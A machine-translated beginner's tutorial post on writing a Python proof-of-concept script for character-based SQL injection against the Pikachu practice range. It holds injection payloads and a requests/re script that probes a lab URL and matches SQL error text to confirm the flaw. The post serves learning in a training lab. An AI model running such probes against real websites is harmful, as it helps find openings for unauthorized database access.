day1 poc And exp learning pikachu Character injection

Before learning , First of all, we have to deal with python The basic grammar of requests as well as re The two modules have a certain understanding and foundation , And right poc,exp,http Knowledge about .（ The editor is also learning , Please bear with me and give me advice if there is something wrong QAQ）

requests And re

poc still exp The compilation and use of are inseparable from these two python library .
requests： simulation Web Requests and corresponding interactive actions . That is, contracting
re： Regular expressions , It is used to verify whether the information of the returned package conforms to the characteristics of the vulnerability , So as to confirm whether the vulnerability exists .
The specific use >>requests>>re

poc And exp

poc And exp The difference is destructive .poc（proof of concept） It means to prove the point , That is to verify whether the vulnerability exists .exp（exploit） Intentional vulnerability exploitation , Used to exploit vulnerabilities .

pikachu-sql Character injection

The shooting range is used here pikachu As an example , To write simple poc And exp.

Digging holes

First, exploit the vulnerability, and then write it according to the process of vulnerability mining and utilization poc And exp. Since the vulnerability here is obvious, I won't go into details . Just start writing poc

poc

The first is the verification of vulnerabilities , Judge whether it exists sql Injection point .

1. Variable

First of all, we need to confirm the sent http Package content variables

url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # To verify the injection point url
name = ["' and 1=1 #","'"] #  test payload
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  #  Customize http baotou 
for i in range(2):
    sqlname = {
    "name": name[i], "submit": " Inquire about "}  #  Injection parameters 

2. send out http package

for i in range(2):
    sqlname = {
    "name": name[i], "submit": " Inquire about "}  #  Injection parameters 
    res = requests.get(url=url, headers=head, params=sqlname)  #  launch get request 

3. Whether there are loopholes

According to the contents of the corresponding package , Perform regular matching to confirm whether there is a vulnerability .

for i in range(2):
    sqlname = {
    "name": name[i], "submit": " Inquire about "}  #  Injection parameters 
    res = requests.get(url=url, headers=head, params=sqlname)  #  launch get request 
    if i==0 and re.findall(" What you entered username non-existent , Please re-enter ！",res.text):# Judge whether it is executed correctly 
        x = 1
        #print(x)
    if i==1 and re.findall("You have an error in your SQL syntax;",res.text):# Determine whether the wrong execution 
        x += 1
        #print(x)
if x==2:
    print(" There is an injection vulnerability ！")

Run validation

Complete code ：

import re

import requests

url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # To verify the injection point url
name = ["' and 1=1 #","'"] #  test payload
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  #  Customize http baotou 
for i in range(2):
    sqlname = {
    "name": name[i], "submit": " Inquire about "}  #  Injection parameters 
    res = requests.get(url=url, headers=head, params=sqlname)  #  launch get request 
    if i==0 and re.findall(" What you entered username non-existent , Please re-enter ！",res.text):
        x = 1
        #print(x)
    if i==1 and re.findall("You have an error in your SQL syntax;",res.text):
        x += 1
        #print(x)
if x==2:
    print(" There is an injection vulnerability ！")

Next issue is the exploitation of loopholes , Conduct exp Compiling ~~